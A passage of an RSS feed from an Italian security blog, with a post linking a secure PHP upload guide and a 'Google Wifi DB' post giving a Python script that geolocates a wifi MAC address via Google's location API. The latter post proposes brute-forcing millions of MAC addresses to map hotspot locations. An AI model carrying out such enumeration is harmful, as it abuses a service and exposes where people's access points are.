src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fpiattaforma-di-simulazione-attacchi-e-studio-minacce%2F&amp;linkname=Piattaforma%20di%20simulazione%20attacchi%20e%20studio%20minacce" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/02/piattaforma-di-simulazione-attacchi-e-studio-minacce/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Upload sicuri con PHP</title>
		<link>http://blog.nicolamoretti.com/2010/02/upload-sicuri-con-php/</link>
		<comments>http://blog.nicolamoretti.com/2010/02/upload-sicuri-con-php/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 12:12:20 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Programming]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[upload]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=122</guid>
		<description><![CDATA[<br/>Il caricamento di file su un server è una delle maggiori fonti di insicurezza per i siti web. Il documento che riporto, scritto da Alla Bezroutchko (ingegnere della sicurezza presso Scanit e persona presente da vari anni nel mondo della sicurezza con molti bug disclosures a proprio nome), rappresenta un vero vademecum per il caricamento tramite PHP. [...]]]></description>
			<content:encoded><![CDATA[<br/><p><a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/secure-file.png" ></a>Il caricamento di file su un server è una delle <strong>maggiori fonti di insicurezza</strong> per i siti web.</p>
<p style="text-align: center;"><img class="aligncenter" style="border: 2px solid black;" title="secure file" src="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/secure-file-300x63.png" alt="" width="300" height="63" /></p>
<p style="text-align: left;">Il documento che riporto, scritto da Alla Bezroutchko (ingegnere della sicurezza presso <a href="http://www.scanit.net/" >Scanit</a> e persona presente da vari anni nel mondo della sicurezza con molti bug disclosures a proprio nome), rappresenta un vero vademecum per il <strong>caricamento tramite PHP</strong>.</p>
<p>Link originale:</p>
<p><a href="http://www.scanit.be/uploads/php-file-upload.pdf" >http://www.scanit.be/uploads/php-file-upload.pdf</a></p>
<p>Se non funzionante, accedi direttamente al file <a href="http://blog.nicolamoretti.com/wp-content/uploads/2010/02/php-file-upload.pdf" >cliccando qui</a>.</p>
<p>Personalmente, oltre ai soliti consigli, raccomando sempre di <span style="text-decoration: underline;">usare per i file caricati un nome casuale</span>, associato a quello del file caricato tramite php. Quando possibile, <span style="text-decoration: underline;">posizionare i file fuori dalle directory accessibili</span> (o bloccarne l&#8217;accesso diretto tramite le configurazioni di Apache) e accederne tramite php. Quando non possibile, <strong>controllare il contenuto dei file caricati, bloccare l&#8217;esecuzione di script nella cartella dedicata all&#8217;upload, verificare accuratamente le impostazioni di apache</strong>.</p>
<div></div>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F02%2Fupload-sicuri-con-php%2F&amp;linkname=Upload%20sicuri%20con%20PHP" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/02/upload-sicuri-con-php/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google Wifi DB</title>
		<link>http://blog.nicolamoretti.com/2010/01/google-wifi-db/</link>
		<comments>http://blog.nicolamoretti.com/2010/01/google-wifi-db/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 15:31:38 +0000</pubDate>
		<dc:creator>Nick</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[db]]></category>
		<category><![CDATA[eng]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[script]]></category>
		<category><![CDATA[wifi]]></category>

		<guid isPermaLink="false">http://blog.nicolamoretti.com/?p=137</guid>
		<description><![CDATA[<br/>Try compiling this form with a wifi MAC Address and press Enter (iframe): The source code is: #!/usr/bin/python # Copyright (C) 2010 Kees Cook # License: GPLv3 # Find location of a MAC address via Google Location Services # http://code.google.com/p/gears/wiki/GeolocationAPI import cgi import sys, urllib2 import simplejson import pprint form = cgi.FieldStorage() if not form: [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Try compiling this form with a wifi MAC Address and press Enter (iframe):</p>
<p><iframe src="http://outflux.net/geoloc/" width="500"></iframe></p>
<p>The source code is:</p>
<pre name="code" class="py">
#!/usr/bin/python
# Copyright (C) 2010 Kees Cook <kees@outflux.net>
# License: GPLv3
# Find location of a MAC address via Google Location Services
# http://code.google.com/p/gears/wiki/GeolocationAPI
import cgi
import sys, urllib2
import simplejson
import pprint

form = cgi.FieldStorage()
if not form:
    print "Content-type: text/html"
    print ""
    print "<html><head></head><body>"
    print "Enter MAC address to locate:
<form>
<input type=text name=mac length=20></form>

"
    print '<a href="index.txt">source</a>'
    print "</body></html>"
    sys.exit(0)

#try:
if True:
    loc_req = { 'version': '1.1.0',
                'request_address': True,
                'address_language': 'en',
                'wifi_towers': [] }
    bssid = form['mac'].value
    loc_req['wifi_towers'] += [{ 'mac_address': bssid.replace(':','-'),
                                 'signal_strength': 1 } ]

    data = simplejson.JSONEncoder().encode(loc_req)

    output = urllib2.urlopen('https://www.google.com/loc/json', data).read()
    output = simplejson.loads(output)

    print "Content-type: text/plain"
    print ""
    pprint.pprint(output)
    if output['location']['accuracy'] >= 22000:
        print "# N.B. Accuracy of 22000 or higher seems to indicate unknown location..."
else:
    print "Content-type: text/html"
    print ""
    print "<html><head></head><body>"
    print "Sorry, something went wrong"
    print "</body></html>"
</pre>
<p>Think at the possibility for somebody to bruteforce Google DB and retrieve these infos.</p>
<p>Starting from <a href="http://standards.ieee.org/regauth/oui/oui.txt" >http://standards.ieee.org/regauth/oui/oui.txt</a>, for example, i can try 16^6 mac addresses starting from 00-18-84 to get info about FON hotspots and achieve locations in a day or less.</p>
<p>I think this is not illegal as this is what my GPhone actually does. PS: I have not checked against any bruteforce prevention.</p>
<p>Thanks to Kees Cook.</p>
<p><a href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Facebook" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Delicious" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Twitter" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Google Reader" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a> <a href="http://www.addtoany.com/add_to/orkut?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Orkut" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/orkut.png" width="16" height="16" alt="Orkut"/></a> <a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/myspace?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="MySpace" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/myspace.png" width="16" height="16" alt="MySpace"/></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Slashdot" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a> <a href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a> <a href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a> <a href="http://www.addtoany.com/add_to/netlog?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Netlog" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/netlog.png" width="16" height="16" alt="Netlog"/></a> <a href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Tumblr" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="Digg" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/friendfeed?linkurl=http%3A%2F%2Fblog.nicolamoretti.com%2F2010%2F01%2Fgoogle-wifi-db%2F&amp;linkname=Google%20Wifi%20DB" title="FriendFeed" rel="nofollow" target="_blank"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/icons/friendfeed.png" width="16" height="16" alt="FriendFeed"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://blog.nicolamoretti.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://blog.nicolamoretti.com/2010/01/google-wifi-db/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
